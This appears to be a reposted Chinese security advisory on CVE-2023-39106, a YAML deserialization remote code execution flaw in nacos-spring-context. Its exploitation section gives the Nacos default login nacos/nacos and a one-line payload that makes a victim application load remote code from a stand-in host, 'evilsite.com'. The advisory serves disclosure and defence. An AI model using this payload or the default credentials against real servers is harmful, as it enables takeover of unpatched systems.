CVE-2023-39106:Nacos-Spring 远程命令执行漏洞 附POC

admin 2024年10月7日00:05:31评论99 views字数 1302阅读4分20秒阅读模式

简介

Nacos是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。Nacos Spring 项目基于Nacos,完全拥抱 Spring 生态,旨在帮助您快速构建 Spring 应用。该项目包含一个名为 的核心模块nacos-spring-context。它使您能够通过以下方式扩展现代 Java 编程模型:注释驱动,依赖注入,外部化配置,事件驱动,这些功能强烈依赖于 Spring Framework 3.2+ API,并且可以与任何 Spring Stack 无缝集成,例如 Spring Boot 和 Spring Cloud。

GitHub:https://github.com/nacos-group/nacos-spring-project

CVE-2023-39106:Nacos-Spring 远程命令执行漏洞 附POC

漏洞描述

反序列化攻击者提供的 yaml 内容可能会导致远程代码执行。因此,当spring框架项目使用nacos-spring-context作为依赖项时,只需在nacos服务器中添加恶意的配置即可轻松进行RCE。

影响版本

nacos-spring-context ≤ V1.1.1

空间测绘

该漏洞属于Spring依赖nacos-spring-context的漏洞,故无测绘特征,只能在源码中体现Nacos空间测绘:app="NACOS"

漏洞利用

1.创建一个空的spring-framework工程,并添加nacos-spring-context的依赖。

2.添加下面的代码,按照文档所说,设置NacosPropertySource:

+import com.alibaba.nacos.api.config.ConfigType;+import com.alibaba.nacos.spring.context.annotation.config.NacosPropertySource; @SpringBootApplication+@NacosPropertySource(dataId = "example.yaml", type=ConfigType.YAML, autoRefreshed=true) public class Application {        public static void main(String[] args) {              ......

3.登录nacos配置服务器

默认地址:http://xxx.xxx.xxx:8848/nacos/#/login默认账密:nacos/nacos

然后编辑example.yaml,添加以下一行配置:

test: !!javax.script.ScriptEngineManager  [ !!java.net.URLClassLoader  [[ !!java.net.URL  [ "http://evilsite.com" ]]]]

参考链接

https://nvd.nist.gov/vuln/detail/CVE-2023-39106https://github.com/nacos-group/nacos-spring-project/issues/314

仅供学习交流,勿用作违法犯罪

CVE-2023-39106:Nacos-Spring 远程命令执行漏洞 附POC

原文始发于微信公众号(不够安全):CVE-2023-39106:Nacos-Spring 远程命令执行漏洞 附POC

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月7日00:05:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-39106:Nacos-Spring 远程命令执行漏洞 附POChttps://cn-sec.com/archives/1974908.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息